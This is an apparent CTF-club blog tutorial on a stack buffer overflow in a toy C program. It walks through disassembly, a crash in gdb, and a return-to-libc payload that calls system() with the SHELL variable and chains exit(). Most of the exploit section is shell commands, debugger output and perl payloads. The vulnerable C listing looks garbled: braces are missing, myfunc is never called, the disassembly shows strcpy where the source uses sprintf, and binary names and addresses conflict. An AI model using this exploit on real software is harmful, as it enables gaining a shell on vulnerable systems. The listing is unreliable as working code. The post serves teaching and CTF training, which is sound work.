'sploits or having fun with the heap, stack, and format strings

As part of the weekly CTF meetings we discussed some basic stack-based, heap-based, and format string based exploits. For system security challenges these are bread and butter techniques and rely on a huge amount of pre-existing knowledge about operating systems, kernels, process creation, dynamic loading, C programming, stack layouts, and assembly. As it's always hard to convey all the information on the white board during an online session, I thought I'd write a quick blog post to give some additional pointers and examples for the demo exploits.

You might or might not have heard that we are starting a CTF team at Purdue called b01lers. The weekly meetings are open to any Purdue student and therefore draws a very mixed crowd, from undergrads to graduate students, first semester technology and computer science students to crypto and system security experts in the final year of their PhD. This results in a very homogeneous group and makes it challenging to, one one hand, keep the topic interesting for the experienced crowd and, on the other hand, not loose the new folk. To allow the CTF club to target more experienced hackers and to enable a faster bootstrapping sequence, both the ACM SIGSAC and the Forensics club presidents have agreed to help out with the training. They will take over some of the more basic tool training, allowing better and faster progress for all the clubs! Together we can make Purdue better known in the security landscape.

Stack-based vulnerability

The first example we'll discuss is a stack-based vulnerability. Individual stack frames can be super tricky and during the live demonstration I successfully talked myself into a corner and screwed up the demo (well, it kind of worked but I did not explain the layouts correctly). Assume we have the following program:

#include <stdio.h>
#include <stdlib.h>

void myfunc(char *strs[])
  char buf[4];
  printf("target (myfunc): last argument is at %p\n", &strs);
  sprintf(buf, "%s", strs[1]);
  printf("we copied '%s' into the buffer\n", buf);

int main(int argc, char *argv[])
  if(argc < 2) {
    printf("usage: %s data\n", argv[0]); return 0;
  printf("target: SHELL is at %p, system is at %p, exit is at %p\n", getenv("SHELL"), &system, &exit);
  printf("And we returned safely from our function\n");
  return 0;

With some C experience we see that function myfunc is susceptible to a buffer overflow. The first argument is an array of strings and the first string is copied into the local stack buffer (which is super small). Luckily for an attacker, the program has many information leaks and will tell us readily about interesting addresses in memory, e.g., the locations of system() and exit() in the libc and the location of the SHELL environment variable above the stack region.

We compile this example with disabled stack protector:

gcc -O0 -fno-stack-protector -o stackoverflow stackoverflow.c

For the sake of reproducability, let's disable ASLR:

sudo sysctl -w kernel.randomize_va_space=0

And when we execute "./stackoverflow fooo" we see:

target: SHELL is at 0xffffd358, system is at 0x8048480, exit is at 0x8048470
target: last argument is at 0xffffcf40
we copied 'fooo' into the buffer
And we returned safely from our function

Now if the supplied argument (fooo above) is longer then 4 bytes we have a buffer overflow and start overwriting parts of the stack that might be used for other data. Even if we copy a larger string (foo1234) the program does not crash (even though a memory safety violation happens and the buffer overflow is overflown). It gets clearer if we look at the assembly of myfunc using objdump (objdump -d ./stackoverflow|less):

804859d:       55                      push   %ebp
804859e:       89 e5                   mov    %esp,%ebp
80485a0:       83 ec 28                sub    $0x28,%esp
80485c2:       8d 45 f4                lea    -0xc(%ebp),%eax
80485c5:       89 04 24                mov    %eax,(%esp)
80485c8:       e8 83 fe ff ff          call   8048450 <strcpy@plt>

In this code sequence we see that the C compiler opens an 0x28 byte stack frame and the buffer buf is allocated at 0xc above the saved ebp of the prior frame. Now if we read the assembly we see that the part of the stack frame that is of interest to us is:

prior frame
saved RIP
saved EBP  <- ebp
4 byte padding
4 byte padding
buf[4]  <- ptr to buf
end of frame  <- esp

So when we write up to 4 bytes everything will be fine. If we write up to 12 bytes we'll have a memory corruption and a memory safety violation but no crash (that's the dangerous area from a software development kind of view as there clearly is a bug but not a crash). If we supply between 12 and 16 bytes then the program will continue but when returning to the caller (main in our example) the stack frame will be adjusted to the new value that the attacker supplied (usually ending in a crash).

Now if we want to exploit this buffer overflow we'll have to redirect the control flow to a function in libc that we can control. For this case, we use the handy system() function that executes a shell command for us.

We execute:

PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print "A"x16;'`

In this example we set a couple of things: first we set two environment variables (PS1 which controls how the prompt looks like and SHELL where we define what command will be executed). As we're overwriting EBP with all 'A's it will obviously crash, but we can note the locations of system, exit, and SHELL for later (in my case the values are 0x8048480 for system, 0x8048470 for exit, and 0xffffd29c for SHELL but your values might differ).

Now, let's examine the crash in a debugger:

gdb --args ./stackoverflow `perl -e 'print "A"x16;'`

If we execute the program using 'run' or 'r' we get a SIGILL due to the messed up stack frame when we return. Using 'bt' we can display the remaining stack frames and with 'frame 0' and 'info frame' we can display data on frames. If we instead execute a longer array (x20 instead of x16 above) we see that the program crashes in 0x41414141:

we copied 'AAAAAAAAAAAAAAAAAAAA' into the buffer

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Looking at the stack frames using 'bt' tells us that it's all messed up. But 0x41 is 'A' in the ASCII table which tells us that we have some control over the return instruction pointer. We can peek around further and set some break points at interesting locations and I invite you to play around ('disas myfunc' displays the assembly of myfunc, 'break *address' stops the execution at address and let's you inspect the program state, 'c' continues, 'si' continues execution one instruction at a time).

Now if we use the information we learned above and set the return instruction pointer to system() we can supply a parameter:

PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print "A"x16 . "\x80\x84\x04\x08" . "\xf3\xc0\xfe\xc0" . "\x9c\xd2\xff\xff";'`

Here we configure the stack as follows:

prior frame            // now saved argument to system, points to SHELL
prior frame            // now saved new ebp, 0xc0f3c0f3 in the example above
saved RIP              // now points to system()
saved EBP  <- ebp      // AAAA
4 byte padding         // AAAA
4 byte padding         // AAAA
buf[4]  <- ptr to buf  // AAAA
end of frame  <- esp

Now if we return from myfunc we no longer end up in main but it looks like a legit call to system() with &SHELL as a parameter. If we execute the command above we're dropped into a shell but if we exit that shell the original program will segfault. If we want a clean exit we can prepare a second stack frame where 0xc0fec0f3 is used as a second invocation frame, executing a clean exit:

PS1='\$ ' SHELL=/bin/sh ./stack_based_overflow `perl -e 'print "A"x16 . "\x80\x84\x04\x08" . "\x70\x84\x04\x08" . "\x9c\xd2\xff\xff";'`

The interested reader may use execl instead of system to ensure that we don't loose SUID privileges. Some articles that you might find interesting to follow up are: